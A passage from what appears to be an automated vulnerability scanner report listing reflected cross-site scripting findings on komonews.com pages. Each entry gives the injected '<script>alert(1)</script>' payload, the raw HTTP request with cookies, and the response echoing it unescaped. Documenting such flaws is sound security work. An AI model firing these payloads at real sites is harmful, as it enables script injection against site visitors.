Host:	http://www.komonews.com
Path:	/news/entertainment/116707059.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26483"><script>alert(1)</script>493e37d1789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116707059.html?26483"><script>alert(1)</script>493e37d1789=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 40489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Photos: Fu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116707059.html?26483"><script>alert(1)</script>493e37d1789=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.30. http://www.komonews.com/news/entertainment/116707059.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116707059.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d053a"><script>alert(1)</script>160ff22fdb5 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116707059.html?ref=guiltypleasuresd053a"><script>alert(1)</script>160ff22fdb5 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 40492

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Photos: Fu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116707059.html?ref=guiltypleasuresd053a"><script>alert(1)</script>160ff22fdb5" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.31. http://www.komonews.com/news/entertainment/116710289.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116710289.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a1c"><script>alert(1)</script>b13f5ec2d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116710289.html?c7a1c"><script>alert(1)</script>b13f5ec2d89=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Alyssa Mil
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116710289.html?c7a1c"><script>alert(1)</script>b13f5ec2d89=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.32. http://www.komonews.com/news/entertainment/116737029.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116737029.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f63"><script>alert(1)</script>ccd130576bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737029.html?b1f63"><script>alert(1)</script>ccd130576bf=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55468

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Lena Horne
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737029.html?b1f63"><script>alert(1)</script>ccd130576bf=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.33. http://www.komonews.com/news/entertainment/116737029.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116737029.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f910"><script>alert(1)</script>824444c91c was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737029.html?ref=guiltypleasures8f910"><script>alert(1)</script>824444c91c HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Lena Horne
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737029.html?ref=guiltypleasures8f910"><script>alert(1)</script>824444c91c" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.34. http://www.komonews.com/news/entertainment/116737724.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116737724.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb6c"><script>alert(1)</script>e5ad59b8bc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737724.html?edb6c"><script>alert(1)</script>e5ad59b8bc5=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57439

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Judge to L
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737724.html?edb6c"><script>alert(1)</script>e5ad59b8bc5=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.35. http://www.komonews.com/news/entertainment/116737724.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116737724.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd82f"><script>alert(1)</script>8b9a4694de9 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737724.html?ref=guiltypleasuresfd82f"><script>alert(1)</script>8b9a4694de9 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57456

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Judge to L
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737724.html?ref=guiltypleasuresfd82f"><script>alert(1)</script>8b9a4694de9" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.36. http://www.komonews.com/news/health/116753189.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/health/116753189.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a076"><script>alert(1)</script>1bb743a14e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/health/116753189.html?4a076"><script>alert(1)</script>1bb743a14e1=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54572

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   21,000 had
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/health/116753189.html?4a076"><script>alert(1)</script>1bb743a14e1=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.37. http://www.komonews.com/news/local/116231884.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116231884.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>8407c6c48ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116231884.html?483eb"><script>alert(1)</script>8407c6c48ab=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Spokane ma
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116231884.html?483eb"><script>alert(1)</script>8407c6c48ab=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.38. http://www.komonews.com/news/local/116509853.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116509853.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2faa"><script>alert(1)</script>b78b2637fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116509853.html?d2faa"><script>alert(1)</script>b78b2637fb2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56252

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   With no bu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116509853.html?d2faa"><script>alert(1)</script>b78b2637fb2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.39. http://www.komonews.com/news/local/116694614.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116694614.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac35f"><script>alert(1)</script>23fa83b97d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116694614.html?ac35f"><script>alert(1)</script>23fa83b97d8=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Police off
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116694614.html?ac35f"><script>alert(1)</script>23fa83b97d8=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.40. http://www.komonews.com/news/local/116703604.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116703604.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e1a"><script>alert(1)</script>2036797cb5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116703604.html?tab=video&26e1a"><script>alert(1)</script>2036797cb5c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54939

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   It's a bir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?tab=video&26e1a"><script>alert(1)</script>2036797cb5c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.41. http://www.komonews.com/news/local/116703604.html [skipthumb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116703604.html

Issue detail

The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c21"><script>alert(1)</script>c8a8d55f906 was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116703604.html?skipthumb=Y17c21"><script>alert(1)</script>c8a8d55f906 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   It's a bir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?skipthumb=Y17c21"><script>alert(1)</script>c8a8d55f906" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.42. http://www.komonews.com/news/local/116703604.html [tab parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116703604.html

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e25b"><script>alert(1)</script>88a93434d89 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116703604.html?tab=video2e25b"><script>alert(1)</script>88a93434d89 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56541

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   It's a bir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?tab=video2e25b"><script>alert(1)</script>88a93434d89" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.43. http://www.komonews.com/news/local/116706579.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116706579.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cb9"><script>alert(1)</script>51a8b418a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116706579.html?53cb9"><script>alert(1)</script>51a8b418a42=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
